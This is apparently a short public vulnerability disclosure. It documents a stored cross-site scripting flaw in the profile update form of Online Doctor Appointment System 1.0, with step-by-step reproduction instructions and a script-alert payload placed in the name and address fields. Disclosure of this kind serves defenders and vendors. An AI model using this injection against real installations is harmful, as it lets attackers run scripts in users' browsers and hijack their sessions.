# Exploit Title: Online Doctor Appointment System 1.0 - Multiple Stored XSS  
# Tested on: Windows 10  
# Exploit Author: Mohamed habib Smidi (Craniums)  
# Date: 2021-01-08  
# Vendor Homepage:  
# Software Link:  
# Affected Version: Version 1  
Step 1: Login to the doctor account in http://TARGET/doctorappointmentsystem/adminlogin.php  
Step 2: then Click on the username and go to profile  
Step 3: Click on Update profile.  
Step 4: Input "<script>alert("craniums")</script>" in the field First Name,Last Name and Address.  
Step 5: This Will trigger the payload each time you update or visit a new page.